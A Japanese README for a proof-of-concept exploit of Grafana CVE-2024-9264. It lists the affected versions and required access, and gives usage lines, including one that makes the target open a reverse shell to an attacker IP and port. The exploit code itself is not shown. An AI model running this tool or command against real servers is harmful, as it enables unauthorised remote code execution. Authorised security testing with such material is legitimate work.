
Grafana RCEエクスプロイト (CVE-2024-9264)
Grafana(CVE-2024-9264)におけるリモートコード実行(RCE)の概念実証です。
このリポジトリには、GrafanaのSQL Expressions機能におけるリモートコード実行(RCE)脆弱性を悪用するPythonスクリプトが含まれています。
不十分な入力サニタイズを利用することで、攻撃者はサーバー上で任意のシェルコマンドを実行できます。
これは、攻撃者がインストールしてロードすることでコマンド実行を可能にするshellfsコミュニティ拡張機能を通じて実現されます。
Viewer権限以上を持つ認証済みのGrafanaユーザーGrafana >= v11.0.0(すべてのv11.x.yが影響を受けます)
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
このスクリプトは教育目的およびシステムのセキュリティをテストする許可を得た管理された環境での使用を意図しています。このツールの誤用は法的な結果を招く可能性があります。